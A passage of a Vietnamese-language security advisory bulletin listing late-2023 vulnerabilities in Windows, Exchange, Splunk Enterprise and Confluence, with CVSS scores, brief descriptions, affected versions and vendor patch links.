Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36036
3.1.3 CVE-2023-36025 Lỗ hổng vượt qua các tính năng bảo mật trong Windows SmartScreen | Windows SmartScreen Security Feature Bypass Vulnerability
CVSS: 8.8/10
Mô tả: Tồn tại lỗ hổng cho phép kẻ tấn công vượt qua các tính năng bảo mật trong Windows Windows Defender SmartScreen. Khai thác lỗ hổng yêu cầu lừa người dùng tương tác với tệp tin Internet Shorcut (.URL) hoặc các siêu liên kết trỏ tới tệp tin Shortcut. Lỗ hổng được Microsoft ghi nhận đang được các nhóm tấn công lợi dụng khai thác.
Phiên bản ảnh hưởng:
Windows Server 2012 R2 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 (Server Core installation)
Windows Server 2012
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2016 (Server Core installation)
Windows Server 2016
Windows 10 Version 1607 for x64-based Systems
Windows 10 Version 1607 for 32-bit Systems
Windows 10 for x64-based Systems
Windows 10 for 32-bit Systems
Windows Server 2022, 23H2 Edition (Server Core installation)
Windows 11 Version 23H2 for x64-based Systems
Windows 11 Version 23H2 for ARM64-based Systems
Windows 10 Version 22H2 for 32-bit Systems
Windows 10 Version 22H2 for ARM64-based Systems
Windows 10 Version 22H2 for x64-based Systems
Windows 11 Version 22H2 for x64-based Systems
Windows 11 Version 22H2 for ARM64-based Systems
Windows 10 Version 21H2 for x64-based Systems
Windows 10 Version 21H2 for ARM64-based Systems
Windows 10 Version 21H2 for 32-bit Systems
Windows 11 version 21H2 for ARM64-based Systems
Windows 11 version 21H2 for x64-based Systems
Windows Server 2022 (Server Core installation)
Windows Server 2022
Windows Server 2019 (Server Core installation)
Windows Server 2019
Windows 10 Version 1809 for ARM64-based Systems
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 1809 for 32-bit Systems
Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36025
3.1.4 CVE-2023-36397 – Lỗ hổng thực thi mã từ xa | Windows Pragmatic General Multicast (PGM) Remote Code Execution Vulnerability
CVSS: 9.8/10
Mô tả: Tồn tại lỗ hổng cho phép kẻ tấn công không cần xác thực, thực thi mã từ xa trên hệ thống bị ảnh hưởng thông qua việc gửi tệp tin được kiểm soát bởi kẻ tấn công. Khai thác lỗ hổng không yêu cầu tương tác từ người dùng.
Phiên bản ảnh hưởng:
Windows Server 2012 R2 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 (Server Core installation)
Windows Server 2012
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2016 (Server Core installation)
Windows Server 2016
Windows 10 Version 1607 for x64-based Systems
Windows 10 Version 1607 for 32-bit Systems
Windows 10 for x64-based Systems
Windows 10 for 32-bit Systems
Windows Server 2022, 23H2 Edition (Server Core installation)
Windows 11 Version 23H2 for x64-based Systems
Windows 11 Version 23H2 for ARM64-based Systems
Windows 10 Version 22H2 for 32-bit Systems
Windows 10 Version 22H2 for ARM64-based Systems
Windows 10 Version 22H2 for x64-based Systems
Windows 11 Version 22H2 for x64-based Systems
Windows 11 Version 22H2 for ARM64-based Systems
Windows 10 Version 21H2 for x64-based Systems
Windows 10 Version 21H2 for ARM64-based Systems
Windows 10 Version 21H2 for 32-bit Systems
Windows 11 version 21H2 for ARM64-based Systems
Windows 11 version 21H2 for x64-based Systems
Windows Server 2022 (Server Core installation)
Windows Server 2022
Windows Server 2019 (Server Core installation)
Windows Server 2019
Windows 10 Version 1809 for ARM64-based Systems
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 1809 for 32-bit Systems
Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36397
3.1.5 CVE-2023-36439 –Lỗ hổng thực thi mã từ xa trên Microsoft Exchange | Microsoft Exchange Server Remote Code Execution Vulnerability
CVSS: 8.0/10
Mô tả: Tồn tại lỗ hổng cho phép kẻ tấn công thực thi mã từ xa trên hệ thống bị ảnh hưởng với quyền NT AUTHORITY\SYSTEM. Khai thác lỗ hổng yêu cầu xác thực.
Phiên bản ảnh hưởng:
Microsoft Exchange Server 2019 Cumulative Update 12
Microsoft Exchange Server 2019 Cumulative Update 13
Microsoft Exchange Server 2016 Cumulative Update 23
Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36439.
3.2 Ứng Dụng Web Và Các Sản Phẩm Khác
3.2.1 CVE-2023-46214 – Remote code execution (RCE) in Splunk Enterprise
CVSS: 8.0/10
Mô tả: Tồn tại lỗ hổng trong Splunk Enterprise do dữ liệu không được xử lý đúng cách. Từ đó kẻ tấn công có thể upload file XSLT độc hại dẫn tới thực thi mã tùy ý trên hệ thống bị ảnh hưởng. Khai thác lỗ hổng yêu cầu xác thực.
Hiện tại mã khai thác và bài phân tích đã được công bố trên Internet:
- https://github.com/nathan31337/Splunk-RCE-poc
- https://blog.hrncirik.net/cve-2023-46214-analysis
Phiên bản ảnh hưởng:
Splunk Enterprise các phiên bản dưới 9.0.7 và 9.1.2
Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:
https://advisory.splunk.com/advisories/SVD-2023-1104.
3.2.2 CVE-2023- 22518 – Improper Authorization Vulnerability In Confluence Data Center and Server
CVSS: 10/10
Mô tả: Tồn tại lỗ hổng cho phép kẻ tấn công không cần xác thực reset Confluence và tạo tài khoản quản trị viên phiên bản Confluence
Phiên bản ảnh hưởng:
Confluence Data Center và Confluence Server tất cả các phiên bản
Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:
https://jira.atlassian.com/browse/CONFSERVER-93142
https://confluence.atlassian.com/security/cve-2023-22518-improper-authorization-vulnerability-in-confluence-data-center-and-server-1311473907.html